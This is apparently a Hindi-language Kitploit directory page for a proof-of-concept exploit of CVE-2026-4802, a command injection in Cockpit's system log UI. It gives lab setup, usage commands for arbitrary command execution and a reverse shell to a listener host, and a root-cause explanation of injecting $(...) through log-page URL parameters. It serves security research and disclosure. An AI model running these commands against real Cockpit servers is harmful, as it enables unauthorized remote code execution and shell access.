Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-4802 — CVE-2026-4802 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Cockpit के सिस्टम लॉग UI में एक कमांड इंजेक्शन भेद्यता है, जो मनमाने कमांड निष्पादन और रिवर्स शेल को सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/hakaioffsec/cve-2026-4802
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHubhakaioffsec/cve-2026-4802

CVE-2026-4802

CVE-2026-4802 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Cockpit के सिस्टम लॉग UI में एक कमांड इंजेक्शन भेद्यता है, जो मनमाने कमांड निष्पादन और रिवर्स शेल को सक्षम बनाता है।

रिपॉजिटरी देखें
4144 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-4802 - कॉकपिट में कमांड इंजेक्शन के माध्यम से रिमोट कोड निष्पादन

CVE-2026-4802 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, कॉकपिट के सिस्टम लॉग UI (loadServiceFilters()) में कमांड इंजेक्शन के माध्यम से रिमोट कोड निष्पादन

सेटअप

कमजोर वातावरण बनाएं और चलाएं:

root@kitploit:~
$ docker build -t cockpit-vuln .
$ docker run --rm -d --privileged -p 9090:9090 cockpit-vuln

उपयोग

root@kitploit:~
# जांचें कि लक्ष्य कमजोर है या नहीं
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode check

# मनमाने कमांड निष्पादित करें
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode exec --cmd "id"

# रिवर्स शेल
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode reverse --lhost 10.0.0.1 --lport 4444

कमजोर संस्करण

  • कॉकपिट (अपैच्ड संस्करण जिनमें pkg/systemd/logsJournal.jsx शामिल है)

मूल कारण

pkg/systemd/logsJournal.jsx में loadServiceFilters() फ़ंक्शन /bin/bash -ec को पास करने से पहले केवल स्पेस एस्केपिंग के साथ ऐरे को स्ट्रिंग्स में जोड़कर शेल कमांड बनाता है। लॉग्स पेज URL फ्रैगमेंट (जैसे --since=) से उपयोगकर्ता-नियंत्रित पैरामीटर बिना सैनिटाइज़ किए इस कोड पथ तक पहुंचते हैं, जिससे कमांड सब्स्टीट्यूशन ($(...)) जैसे शेल मेटाकैरेक्टर इंजेक्ट करने की अनुमति मिलती है।

अस्वीकरण

यह टूल केवल शैक्षिक और शोध उद्देश्यों के लिए है। इसका उपयोग केवल उन सिस्टमों पर करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है। लेखक इस प्रोग्राम के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।

QuimeraX Intelligence

QuimeraX Intelligence एक उन्नत EASM और साइबर खतरा खुफिया प्लेटफ़ॉर्म है जो जटिल सिस्टमों में महत्वपूर्ण कमजोरियों की पहचान करने में विशेषज्ञता रखता है। प्लेटफ़ॉर्म सुरक्षा खतरों के बारे में ग्राहकों को सक्रिय रूप से निगरानी, पता लगाने और सतर्क करता है, जिससे संभावित जोखिमों के प्रति पारदर्शिता और त्वरित प्रतिक्रिया सुनिश्चित होती है। यदि ग्राहकों के सिस्टम कमजोर पाए जाते हैं, तो उन्हें तुरंत सूचनाएं और व्यापक रिपोर्ट प्राप्त होती हैं, जिससे वे सुरक्षात्मक कार्रवाई कर सकें। और जानें

Hakai Security

Hakai Security एक साइबर सुरक्षा कंपनी है जिसकी स्थापना सुरक्षा पेशेवरों द्वारा की गई है, जो तकनीकी उत्कृष्टता के लिए प्रतिबद्ध है। हम उन्नत पेनेट्रेशन टेस्टिंग, यथार्थवादी रेड टीम सिमुलेशन और सुरक्षित विकास प्रथाओं सहित अनुकूलित सुरक्षा समाधान प्रदान करते हैं ताकि ग्राहकों की संपत्तियों को विकसित हो रहे साइबर खतरों से सक्रिय रूप से सुरक्षित रखा जा सके।

संदर्भ

  • https://bugzilla.redhat.com/show_bug.cgi?id=2451155
  • https://access.redhat.com/security/cve/CVE-2026-4802
  • https://www.cve.org/CVERecord?id=CVE-2026-4802
टूल डाउनलोड करें